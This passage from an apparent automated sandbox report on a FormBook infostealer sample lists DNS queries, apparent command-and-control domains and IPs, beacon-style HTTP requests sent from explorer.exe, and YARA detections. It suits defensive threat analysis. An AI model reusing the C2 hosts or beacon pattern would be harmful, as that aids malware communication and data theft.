May 12, 2021 12:26:13.867902040 CEST	53	64910	8.8.8.8	192.168.2.3
May 12, 2021 12:26:13.931727886 CEST	53	61946	8.8.8.8	192.168.2.3
May 12, 2021 12:26:19.256853104 CEST	52123	53	192.168.2.3	8.8.8.8
May 12, 2021 12:26:19.358293056 CEST	53	52123	8.8.8.8	192.168.2.3
May 12, 2021 12:26:24.372886896 CEST	56130	53	192.168.2.3	8.8.8.8
May 12, 2021 12:26:24.451124907 CEST	53	56130	8.8.8.8	192.168.2.3
May 12, 2021 12:26:30.060688972 CEST	56338	53	192.168.2.3	8.8.8.8
May 12, 2021 12:26:30.125046015 CEST	53	56338	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 12:25:24.027081966 CEST	192.168.2.3	8.8.8.8	0xa172	Standard query (0)	www.skynetaccess.com	A (IP address)	IN (0x0001)
May 12, 2021 12:25:29.761121035 CEST	192.168.2.3	8.8.8.8	0x4a6e	Standard query (0)	www.thepocket-onlinelesson.xyz	A (IP address)	IN (0x0001)
May 12, 2021 12:25:35.858010054 CEST	192.168.2.3	8.8.8.8	0x66a3	Standard query (0)	www.shirleyeluiz.com	A (IP address)	IN (0x0001)
May 12, 2021 12:25:46.166529894 CEST	192.168.2.3	8.8.8.8	0x2fa3	Standard query (0)	www.drisu-goalkeeping.com	A (IP address)	IN (0x0001)
May 12, 2021 12:25:51.342669964 CEST	192.168.2.3	8.8.8.8	0x1f0b	Standard query (0)	www.rogegalmish.com	A (IP address)	IN (0x0001)
May 12, 2021 12:25:57.237812042 CEST	192.168.2.3	8.8.8.8	0x7055	Standard query (0)	www.webdomoupravitel.com	A (IP address)	IN (0x0001)
May 12, 2021 12:26:02.336038113 CEST	192.168.2.3	8.8.8.8	0x6182	Standard query (0)	www.best-cleaner.com	A (IP address)	IN (0x0001)
May 12, 2021 12:26:08.219162941 CEST	192.168.2.3	8.8.8.8	0xb6c6	Standard query (0)	www.4520oceanviewavenue.com	A (IP address)	IN (0x0001)
May 12, 2021 12:26:13.767909050 CEST	192.168.2.3	8.8.8.8	0x609b	Standard query (0)	www.omfgphil.com	A (IP address)	IN (0x0001)
May 12, 2021 12:26:19.256853104 CEST	192.168.2.3	8.8.8.8	0x3a0c	Standard query (0)	www.tracisolomon.xyz	A (IP address)	IN (0x0001)
May 12, 2021 12:26:24.372886896 CEST	192.168.2.3	8.8.8.8	0x2e78	Standard query (0)	www.home-inland.com	A (IP address)	IN (0x0001)
May 12, 2021 12:26:30.060688972 CEST	192.168.2.3	8.8.8.8	0xdff9	Standard query (0)	www.boostcoachingonline.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 12:25:24.189014912 CEST	8.8.8.8	192.168.2.3	0xa172	No error (0)	www.skynetaccess.com		52.128.23.153	A (IP address)	IN (0x0001)
May 12, 2021 12:25:30.059087992 CEST	8.8.8.8	192.168.2.3	0x4a6e	No error (0)	www.thepocket-onlinelesson.xyz		202.210.8.86	A (IP address)	IN (0x0001)
May 12, 2021 12:25:36.019768000 CEST	8.8.8.8	192.168.2.3	0x66a3	No error (0)	www.shirleyeluiz.com		34.95.69.141	A (IP address)	IN (0x0001)
May 12, 2021 12:25:46.232381105 CEST	8.8.8.8	192.168.2.3	0x2fa3	No error (0)	www.drisu-goalkeeping.com	drisu-goalkeeping.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 12:25:46.232381105 CEST	8.8.8.8	192.168.2.3	0x2fa3	No error (0)	drisu-goalkeeping.com		81.169.145.162	A (IP address)	IN (0x0001)
May 12, 2021 12:25:51.535154104 CEST	8.8.8.8	192.168.2.3	0x1f0b	No error (0)	www.rogegalmish.com	rogegalmish.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 12:25:51.535154104 CEST	8.8.8.8	192.168.2.3	0x1f0b	No error (0)	rogegalmish.com		192.232.222.43	A (IP address)	IN (0x0001)
May 12, 2021 12:25:57.300525904 CEST	8.8.8.8	192.168.2.3	0x7055	Name error (3)	www.webdomoupravitel.com	none	none	A (IP address)	IN (0x0001)
May 12, 2021 12:26:02.398396015 CEST	8.8.8.8	192.168.2.3	0x6182	No error (0)	www.best-cleaner.com		156.252.96.189	A (IP address)	IN (0x0001)
May 12, 2021 12:26:08.278670073 CEST	8.8.8.8	192.168.2.3	0xb6c6	No error (0)	www.4520oceanviewavenue.com	4520oceanviewavenue.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 12:26:08.278670073 CEST	8.8.8.8	192.168.2.3	0xb6c6	No error (0)	4520oceanviewavenue.com		184.168.131.241	A (IP address)	IN (0x0001)
May 12, 2021 12:26:13.931727886 CEST	8.8.8.8	192.168.2.3	0x609b	No error (0)	www.omfgphil.com		64.98.145.30	A (IP address)	IN (0x0001)
May 12, 2021 12:26:19.358293056 CEST	8.8.8.8	192.168.2.3	0x3a0c	Server failure (2)	www.tracisolomon.xyz	none	none	A (IP address)	IN (0x0001)
May 12, 2021 12:26:24.451124907 CEST	8.8.8.8	192.168.2.3	0x2e78	No error (0)	www.home-inland.com	home-inland.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 12:26:24.451124907 CEST	8.8.8.8	192.168.2.3	0x2e78	No error (0)	home-inland.com		81.88.52.88	A (IP address)	IN (0x0001)
May 12, 2021 12:26:30.125046015 CEST	8.8.8.8	192.168.2.3	0xdff9	No error (0)	www.boostcoachingonline.com	boostcoachingonline.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 12:26:30.125046015 CEST	8.8.8.8	192.168.2.3	0xdff9	No error (0)	boostcoachingonline.com		184.168.131.241	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.skynetaccess.com

www.thepocket-onlinelesson.xyz

www.shirleyeluiz.com

www.drisu-goalkeeping.com

www.rogegalmish.com

www.best-cleaner.com

www.4520oceanviewavenue.com

www.omfgphil.com

www.boostcoachingonline.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49728	52.128.23.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 12:25:24.565185070 CEST	1282	OUT	GET /a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- HTTP/1.1 Host: www.skynetaccess.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 12:25:24.747936010 CEST	1282	IN	HTTP/1.1 463 Server: nginx Date: Wed, 12 May 2021 10:25:24 GMT Content-Type: text/html Content-Length: 8915 Connection: close ETag: "5e52ceb0-22d3" X-DIS-Request-ID: e8467c834b8474c3c6b18d0d2ca7da5e Set-Cookie: dis-remote-addr=84.17.52.78 Set-Cookie: dis-timestamp=2021-05-12T03:25:24-07:00 Set-Cookie: dis-request-id=e8467c834b8474c3c6b18d0d2ca7da5e X-Frame-Options: sameorigin
May 12, 2021 12:25:24.747955084 CEST	1284	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"
May 12, 2021 12:25:24.747977018 CEST	1285	IN	Data Raw: 72 63 3d 22 2f 44 4f 41 45 72 72 6f 72 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 5f 74 72 61 6e 73 5f 73 70 61 63 65 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 77 69 64 74 68 3d 22 31 38 22 20 68 65 69 67 68 74 3d 22 31 38 22 Data Ascii: rc="/DOAError/assets/images/bottom_trans_spacer.png" alt="" width="18" height="18" /></td> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spacer.png" alt="" width="18" height="18" /></td> </tr> <tr> <td w
May 12, 2021 12:25:24.747996092 CEST	1286	IN	Data Raw: 50 72 6f 74 65 63 74 69 6f 6e 22 20 74 69 74 6c 65 3d 22 44 4f 53 61 72 72 65 73 74 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 7c 20 44 44 6f 53 20 50 72 6f 74 65 63 74 69 6f 6e 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 0d 0a 20 20 20 Data Ascii: Protection" title="DOSarrest Internet Security \| DDoS Protection" /></a></td> </tr> </table></td> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width="18" height="55" /></td> </tr> <
May 12, 2021 12:25:24.748023033 CEST	1288	IN	Data Raw: 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 32 31 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 44 4f 41 45 72 72 6f 72 2f 61 73 Data Ascii: <tr> <td width="121" align="center"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width="10" height="120" alt=""/></td> <td width="500" align="center" class="errortitle">463</td>
May 12, 2021 12:25:24.748044968 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 38 37 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 Data Ascii: <td width="187" align="center" valign="top"> </td> <td width="102" align="center" valign="top" class="imagetext">Host<br /><span style="font-size: x-small" id="host2"></span><script>functio
May 12, 2021 12:25:24.748064041 CEST	1290	IN	Data Raw: 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 69 64 5f 66 69 6e 69 73 68 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 69 64 5f 70 72 6f 63 65 73 73 28 22 64 69 73 2d 72 65 71 75 65 73 74 2d 69 64 22 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 74 64 3e 0d 0a 20 Data Ascii: tElementById("id_finish").innerHTML=id_process("dis-request-id");</script></td> </tr> </tbody> </table></td> <td align="center">\|</td> <td width="30%" a
May 12, 2021 12:25:24.748081923 CEST	1291	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 Data Ascii: </tr> </tbody> </table></td> </tr> <tr> <td align="center"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width="18" height="8" /></td> </tr> <tr>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49730	202.210.8.86	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 12:25:30.334672928 CEST	1298	OUT	GET /a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl- HTTP/1.1 Host: www.thepocket-onlinelesson.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 12:25:32.124258041 CEST	1299	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 12 May 2021 10:25:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://thepocket-onlinelesson.xyz/a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl-

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49731	34.95.69.141	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 12:25:36.062501907 CEST	1300	OUT	GET /a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- HTTP/1.1 Host: www.shirleyeluiz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 12:25:36.103701115 CEST	1303	IN	HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Location: https://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- Content-Length: 319 Date: Wed, 12 May 2021 10:25:36 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 69 72 6c 65 79 65 6c 75 69 7a 2e 63 6f 6d 2f 61 38 73 69 2f 3f 4e 5a 62 3d 70 4d 34 41 39 79 39 73 32 66 51 4f 54 36 4d 73 65 4c 5a 36 44 31 6e 4a 70 33 5a 6f 58 69 31 44 49 7a 38 48 52 45 4b 73 37 6c 57 4b 6f 32 72 43 66 6b 33 59 42 43 57 6b 31 4c 62 77 58 6a 6b 48 73 65 51 2f 26 61 6d 70 3b 32 64 4e 44 3d 47 56 54 6c 2d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl-">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49738	81.169.145.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 12:25:46.276973963 CEST	5546	OUT	GET /a8si/?NZb=ilDJZobCAoASZPKEjr+h2GJPzQZtXgxPn5qCqJ2imUF6WWwra1RdIaAgDcyp8aYyL3aO&2dND=GVTl- HTTP/1.1 Host: www.drisu-goalkeeping.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 12:25:46.322741985 CEST	5547	IN	HTTP/1.1 404 Not Found Date: Wed, 12 May 2021 10:25:46 GMT Server: Apache/2.4.46 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49739	192.232.222.43	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 12:25:51.724770069 CEST	5548	OUT	GET /a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- HTTP/1.1 Host: www.rogegalmish.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 12:25:53.418782949 CEST	5549	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 12 May 2021 10:25:53 GMT Server: nginx/1.19.10 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.rogegalmish.com/a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- X-Server-Cache: true X-Proxy-Cache: MISS

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49740	156.252.96.189	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 12:26:02.702056885 CEST	5550	OUT	GET /a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl- HTTP/1.1 Host: www.best-cleaner.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 12:26:03.283816099 CEST	5551	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.16.1 Date: Wed, 12 May 2021 10:26:03 GMT Content-Type: text/html; charset=gbk Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 Set-Cookie: ASP.NET_SessionId=umxa4r1wpqvtit5wadtbqazl; path=/; HttpOnly; SameSite=Lax Location: /404.html Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49741	184.168.131.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 12:26:08.493067980 CEST	5552	OUT	GET /a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl- HTTP/1.1 Host: www.4520oceanviewavenue.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 12:26:08.756416082 CEST	5553	IN	HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Wed, 12 May 2021 10:26:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 3c 2f 74 69 74 6c 65 3e 20 20 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 0a 20 20 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 74 6f 75 72 73 2e 74 6f 75 72 69 6d 61 67 69 6e 67 2e 63 6f 6d 2f 73 2f 69 64 78 2f 35 37 37 30 33 33 3f 4e 5a 62 3d 4f 33 6f 31 55 2b 71 38 6f 4d 57 30 41 34 30 51 75 4d 34 6b 7a 5a 46 7a 75 76 47 5a 78 31 38 46 32 4a 31 6a 4f 6a 30 48 73 46 75 65 59 69 47 33 64 49 70 74 48 70 68 6f 52 5a 4a 79 2f 2f 66 4f 46 65 68 41 26 61 6d 70 3b 32 64 4e 44 3d 47 56 54 6c 2d 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 2f 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ff<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head> <title>Tour Imaging Virtual Tours</title> <meta name="description" content="Tour Imaging Virtual Tours"> <meta name="keywords" content="Tour Imaging Virtual Tours"></head><frameset rows="100%,*" border="0"> <frame src="http://tours.tourimaging.com/s/idx/577033?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl-" frameborder="0" /></frameset></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49744	64.98.145.30	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 12:26:14.073214054 CEST	5570	OUT	GET /a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- HTTP/1.1 Host: www.omfgphil.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 12:26:14.218874931 CEST	5572	IN	HTTP/1.1 303 See Other Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Status: 303 See Other X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Location: https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- Cache-Control: no-cache X-Request-Id: 98627d13-1f0d-4d0f-ac6c-3f13cb1515d0 X-Runtime: 0.006362 X-Powered-By: Phusion Passenger 4.0.53 Date: Wed, 12 May 2021 10:29:49 GMT Server: nginx/1.6.2 + Phusion Passenger 4.0.53 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Data Raw: 62 65 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 6d 2e 74 69 6b 74 6f 6b 2e 63 6f 6d 2f 5a 4d 4a 45 33 73 75 65 70 2f 61 38 73 69 3f 4e 5a 62 3d 6a 64 4e 2b 33 52 55 65 6d 73 38 58 67 4a 41 4e 55 77 73 34 57 57 74 6b 62 76 58 78 4d 75 32 68 54 51 2f 74 36 4b 33 66 2b 74 38 70 72 58 69 37 4a 67 57 4b 6b 2b 71 2b 57 48 6c 46 6f 68 46 68 6e 71 74 7a 26 61 6d 70 3b 32 64 4e 44 3d 47 56 54 6c 2d 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: be<html><body>You are being <a href="https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl-">redirected</a>.</body></html>
May 12, 2021 12:26:14.218928099 CEST	5572	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49746	184.168.131.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 12:26:30.319866896 CEST	5588	OUT	GET /a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl- HTTP/1.1 Host: www.boostcoachingonline.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 12:26:30.541549921 CEST	5589	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.16.1 Date: Wed, 12 May 2021 10:26:30 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: http://zoom.us/j/8574583197?pwd=R20vRUg0bGh1THUxUDZZQm9JVlRadz09 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 457b22da_by_Libranalysis.exe PID: 4120 Parent PID: 5652

General

Start time:	12:24:19
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
Imagebase:	0x250000
File size:	973824 bytes
MD5 hash:	457B22DA77D4DB093A31DD80A4B8963F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 457b22da_by_Libranalysis.exe PID: 5452 Parent PID: 4120

General

Start time:	12:24:28
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
Imagebase:	0xd80000
File size:	973824 bytes
MD5 hash:	457B22DA77D4DB093A31DD80A4B8963F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 